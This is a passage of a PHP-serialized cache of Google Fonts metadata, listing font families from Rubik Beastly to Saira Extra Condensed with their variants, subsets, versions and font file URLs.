Beastly\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/rubikbeastly/v10/0QImMXRd5oOmSC2ZQ7o9653X07z8_ApHqqk.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1183;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Rubik Bubbles\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/rubikbubbles/v2/JIA1UVdwbHFJtwA7Us1BPFbRNTENfDxyRXI.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1184;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Rubik Burned\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/rubikburned/v1/Jqzk5TmOVOqQHihKqPpscqniHQuaCY5ZSg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1185;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Rubik Dirt\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/rubikdirt/v1/DtVmJxC7WLEj1uIXEWAdulwm6gDXvwE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1186;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Rubik Distressed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/rubikdistressed/v1/GFDxWBdsmnqAVqjtUsZf2dcrQ2ldcWAhatVBaGM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1187;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Rubik Glitch\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/rubikglitch/v2/qkBSXv8b_srFRYQVYrDKh9ZvmC7HONiSFQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1188;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Rubik Iso\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:73:\"http://fonts.gstatic.com/s/rubikiso/v1/x3dickHUfr-S4VAI4sABfPACvy_1BA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1189;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Rubik Marker Hatch\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/rubikmarkerhatch/v1/QldTNSFQsh0B_bFXXWv6LAt-jswapJHQDL4iw0H6zw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1190;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Rubik Maze\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/rubikmaze/v1/xMQRuF9ZVa2ftiJEavXSAX7inS-bxV4.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1191;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Rubik Microbe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/rubikmicrobe/v2/UqyWK8oPP3hjw6ANS9rM3PsZcs8aaKgiauE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1192;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Rubik Mono One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/rubikmonoone/v14/UqyJK8kPP3hjw6ANTdfRk9YSN-8wRqQrc_j9.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1193;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Rubik Moonrocks\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/rubikmoonrocks/v2/845ANMAmAI2VUZMLu_W0M7HqlDHnXcD7JGy1Sw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1194;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Rubik Puddles\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/rubikpuddles/v2/1Ptog8bYX_qGnkLkrU5MJsQcJfC0wVMT-aE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1195;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Rubik Wet Paint\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/rubikwetpaint/v2/HTx0L20uMDGHgdULcpTF3Oe4d_-F-zz313DuvQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1196;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Ruda\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaJFsi_-2KiSGg-H.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaJ3si_-2KiSGg-H.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaKbtS_-2KiSGg-H.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaKitS_-2KiSGg-H.ttf\";s:3:\"800\";s:80:\"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaLFtS_-2KiSGg-H.ttf\";s:3:\"900\";s:80:\"http://fonts.gstatic.com/s/ruda/v23/k3kKo8YQJOpFgHQ1mQ5VkEbUKaLstS_-2KiSGg-H.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1197;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Rufina\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/rufina/v13/Yq6V-LyURyLy-aKyoxRktOdClg.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/rufina/v13/Yq6W-LyURyLy-aKKHztAvMxenxE0SA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1198;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Ruge Boogie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/rugeboogie/v24/JIA3UVFwbHRF_GIWSMhKNROiPzUveSxy.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1199;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Ruluko\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/ruluko/v21/xMQVuFNZVaODtm0pC6WzKX_QmA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1200;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Rum Raisin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/rumraisin/v20/nwpRtKu3Ih8D5avB4h2uJ3-IywA7eMM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1201;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Ruslan Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/ruslandisplay/v22/Gw6jwczl81XcIZuckK_e3UpfdzxrldyFvm1n.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1202;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Russo One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/russoone/v14/Z9XUDmZRWg6M1LvRYsH-yMOInrib9Q.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1203;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Ruthie\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/ruthie/v24/gokvH63sGkdqXuU9lD53Q2u_mQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1204;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"Rye\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:61:\"http://fonts.gstatic.com/s/rye/v13/r05XGLJT86YDFpTsXOqx4w.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1205;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"STIX Two Text\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Gr02F12Xkf5whdwKf11l0jbKkeidMTtZ5Yihg2SOYWxFMN1WD.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Gr02F12Xkf5whdwKf11l0jbKkeidMTtZ5YihS2SOYWxFMN1WD.ttf\";s:3:\"600\";s:99:\"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Gr02F12Xkf5whdwKf11l0jbKkeidMTtZ5Yii-3iOYWxFMN1WD.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Gr02F12Xkf5whdwKf11l0jbKkeidMTtZ5YiiH3iOYWxFMN1WD.ttf\";s:6:\"italic\";s:102:\"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Er02F12Xkf5whdwKf11l0p7uWhf8lJUzXZT2omsvbURVuMkWDmSo.ttf\";s:9:\"500italic\";s:102:\"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Er02F12Xkf5whdwKf11l0p7uWhf8lJUzXZT2omvnbURVuMkWDmSo.ttf\";s:9:\"600italic\";s:102:\"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Er02F12Xkf5whdwKf11l0p7uWhf8lJUzXZT2omhXcURVuMkWDmSo.ttf\";s:9:\"700italic\";s:102:\"http://fonts.gstatic.com/s/stixtwotext/v10/YA9Er02F12Xkf5whdwKf11l0p7uWhf8lJUzXZT2omizcURVuMkWDmSo.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1206;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Sacramento\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/sacramento/v13/buEzpo6gcdjy0EiZMBUG0CoV_NxLeiw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1207;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Sahitya\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/sahitya/v17/6qLAKZkOuhnuqlJAaScFPywEDnI.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/sahitya/v17/6qLFKZkOuhnuqlJAUZsqGyQvEnvSexI.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1208;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Sail\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/sail/v16/DPEjYwiBxwYJFBTDADYAbvw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1209;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Saira\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA71rDosg7lwYmUVY.ttf\";s:3:\"200\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA79rCosg7lwYmUVY.ttf\";s:3:\"300\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA7wTCosg7lwYmUVY.ttf\";s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA71rCosg7lwYmUVY.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA72jCosg7lwYmUVY.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA74TFosg7lwYmUVY.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA773Fosg7lwYmUVY.ttf\";s:3:\"800\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA79rFosg7lwYmUVY.ttf\";s:3:\"900\";s:100:\"http://fonts.gstatic.com/s/saira/v14/memWYa2wxmKQyPMrZX79wwYZQMhsyuShhKMjjbU9uXuA7_PFosg7lwYmUVY.ttf\";s:9:\"100italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBSooxkyQjQVYmxA.ttf\";s:9:\"200italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKByosxkyQjQVYmxA.ttf\";s:9:\"300italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBFIsxkyQjQVYmxA.ttf\";s:6:\"italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBSosxkyQjQVYmxA.ttf\";s:9:\"500italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBeIsxkyQjQVYmxA.ttf\";s:9:\"600italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBlIwxkyQjQVYmxA.ttf\";s:9:\"700italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKBrYwxkyQjQVYmxA.ttf\";s:9:\"800italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKByowxkyQjQVYmxA.ttf\";s:9:\"900italic\";s:103:\"http://fonts.gstatic.com/s/saira/v14/memUYa2wxmKQyNkiV50dulWP7s95AqZTzZHcVdxWI9WH-pKB44wxkyQjQVYmxA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1210;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Saira Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:90:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJRMQgErUN8XuHNEtX81i9TmEkrnwetA2omSrzS8.ttf\";s:3:\"200\";s:92:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnbcpg8Keepi2lHw.ttf\";s:3:\"300\";s:92:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnCclg8Keepi2lHw.ttf\";s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJROQgErUN8XuHNEtX81i9TmEkrfpeFE-IyCrw.ttf\";s:3:\"500\";s:92:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnUchg8Keepi2lHw.ttf\";s:3:\"600\";s:92:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnfc9g8Keepi2lHw.ttf\";s:3:\"700\";s:92:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnGc5g8Keepi2lHw.ttf\";s:3:\"800\";s:92:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnBc1g8Keepi2lHw.ttf\";s:3:\"900\";s:92:\"http://fonts.gstatic.com/s/sairacondensed/v11/EJRLQgErUN8XuHNEtX81i9TmEkrnIcxg8Keepi2lHw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1211;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Saira Extra Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:103:\"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFsOHYr-vcC7h8MklGBkrvmUG9rbpkisrTri0jx9i5ss3a3.ttf\";s:3:\"200\";s:105:\"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrJ2nR3ABgum-uoQ.ttf\";s:3:\"300\";s:105:\"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrQ2rR3ABgum-uoQ.ttf\";s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFiOHYr-vcC7h8MklGBkrvmUG9rbpkisrTT70L11Ct8sw.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrG2vR3ABgum-uoQ.ttf\";s:3:\"600\";s:105:\"http://fonts.gst